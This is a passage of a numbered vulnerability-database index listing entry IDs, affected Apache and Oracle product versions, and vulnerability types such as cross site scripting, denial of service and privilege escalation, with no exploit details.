1675| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
1676| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
1677| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
1678| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
1679| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
1680| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
1681| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
1682| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
1683| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
1684| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
1685| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
1686| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
1687| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
1688| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
1689| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
1690| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
1691| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
1692| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
1693| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
1694| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
1695| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
1696| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
1697| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
1698| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
1699| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
1700| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
1701| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
1702| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
1703| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
1704| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
1705| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
1706| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
1707| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
1708| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
1709| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
1710| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
1711| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
1712| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
1713| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
1714| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
1715| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
1716| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
1717| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
1718| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
1719| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
1720| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
1721| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
1722| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
1723| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
1724| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
1725| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
1726| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
1727| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
1728| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
1729| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
1730| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
1731| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
1732| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
1733| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
1734| [136370] Apache Fineract up to 1.2.x sql injection
1735| [136369] Apache Fineract up to 1.2.x sql injection
1736| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
1737| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
1738| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
1739| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
1740| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
1741| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
1742| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
1743| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
1744| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
1745| [134416] Apache Sanselan 0.97-incubator Loop denial of service
1746| [134415] Apache Sanselan 0.97-incubator Hang denial of service
1747| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
1748| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
1749| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
1750| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
1751| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
1752| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
1753| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
1754| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
1755| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
1756| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
1757| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
1758| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
1759| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
1760| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
1761| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
1762| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
1763| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
1764| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
1765| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
1766| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
1767| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
1768| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
1769| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
1770| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
1771| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
1772| [131859] Apache Hadoop up to 2.9.1 privilege escalation
1773| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
1774| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
1775| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
1776| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
1777| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
1778| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
1779| [130629] Apache Guacamole Cookie Flag weak encryption
1780| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
1781| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
1782| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
1783| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
1784| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
1785| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
1786| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
1787| [130123] Apache Airflow up to 1.8.2 information disclosure
1788| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
1789| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
1790| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
1791| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
1792| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
1793| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
1794| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
1795| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
1796| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
1797| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
1798| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
1799| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
1800| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
1801| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
1802| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
1803| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
1804| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
1805| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
1806| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
1807| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
1808| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
1809| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
1810| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
1811| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
1812| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
1813| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
1814| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
1815| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
1816| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
1817| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
1818| [129458] Oracle Communications Online Mediation Controller 6.1 Apache Log4j unknown vulnerability
1819| [129457] Oracle Communications Diameter Signaling Router up to 8.2 Apache Commons Fileupload unknown vulnerability
1820| [129456] Oracle Communications Converged Application Server 6.1 Apache Log4j unknown vulnerability
1821| [128714] Apache Thrift Java Client Library up to 0.11.0 SASL Negotiation org.apache.thrift.transport.TSaslTransport unknown vulnerability
1822| [128713] Apache Thrift Node.js Static Web Server up to 0.11.0 directory traversal
1823| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
1824| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
1825| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
1826| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
1827| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
1828| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
1829| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
1830| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
1831| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
1832| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
1833| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
1834| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
1835| [127007] Apache Spark Request Code Execution
1836| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
1837| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
1838| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
1839| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
1840| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
1841| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
1842| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
1843| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
1844| [126346] Apache Tomcat Path privilege escalation
1845| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
1846| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
1847| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
1848| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
1849| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
1850| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
1851| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
1852| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
1853| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
1854| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
1855| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
1856| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
1857| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
1858| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
1859| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
1860| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
1861| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
1862| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
1863| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
1864| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
1865| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
1866| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
1867| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
1868| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
1869| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
1870| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
1871| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
1872| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
1873| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
1874| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
1875| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
1876| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
1877| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
1878| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
1879| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
1880| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
1881| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
1882| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
1883| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
1884| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
1885| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
1886| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
1887| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
1888| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
1889| [123197] Apache Sentry up to 2.0.0 privilege escalation
1890| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
1891| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
1892| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
1893| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
1894| [122800] Apache Spark 1.3.0 REST API weak authentication
1895| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
1896| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
1897| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
1898| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
1899| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
1900| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
1901| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
1902| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
1903| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
1904| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
1905| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
1906| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
1907| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
1908| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
1909| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
1910| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
1911| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
1912| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
1913| [121354] Apache CouchDB HTTP API Code Execution
1914| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
1915| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
1916| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
1917| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
1918| [120168] Apache CXF weak authentication
1919| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
1920| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
1921| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
1922| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
1923| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
1924| [119306] Apache MXNet Network Interface privilege escalation
1925| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
1926| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
1927| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
1928| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
1929| [118143] Apache NiFi activemq-client Library Deserialization denial of service
1930| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
1931| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
1932| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
1933| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
1934| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
1935| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
1936| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
1937| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
1938| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
1939| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
1940| [117115] Apache Tika up to 1.17 tika-server command injection
1941| [116929] Apache Fineract getReportType Parameter privilege escalation
1942| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
1943| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
1944| [116926] Apache Fineract REST Parameter privilege escalation
1945| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
1946| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
1947| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
1948| [115883] Apache Hive up to 2.3.2 privilege escalation
1949| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
1950| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
1951| [115518] Apache Ignite 2.3 Deserialization privilege escalation
1952| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
1953| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
1954| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
1955| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
1956| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
1957| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
1958| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
1959| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
1960| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
1961| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
1962| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
1963| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
1964| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
1965| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
1966| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
1967| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
1968| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
1969| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
1970| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
1971| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
1972| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
1973| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
1974| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
1975| [113895] Apache Geode up to 1.3.x Code Execution
1976| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
1977| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
1978| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
1979| [113747] Apache Tomcat Servlets privilege escalation
1980| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
1981| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
1982| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
1983| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
1984| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
1985| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
1986| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
1987| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
1988| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
1989| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
1990| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
1991| [112885] Apache Allura up to 1.8.0 File information disclosure
1992| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
1993| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
1994| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
1995| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
1996| [112625] Apache POI up to 3.16 Loop denial of service
1997| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
1998| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
1999| [112339] Apache NiFi 1.5.0 Header privilege escalation
2000| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
2001| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
2002| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
2003| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
2004| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
2005| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
2006| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
2007| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
2008| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
2009| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
2010| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
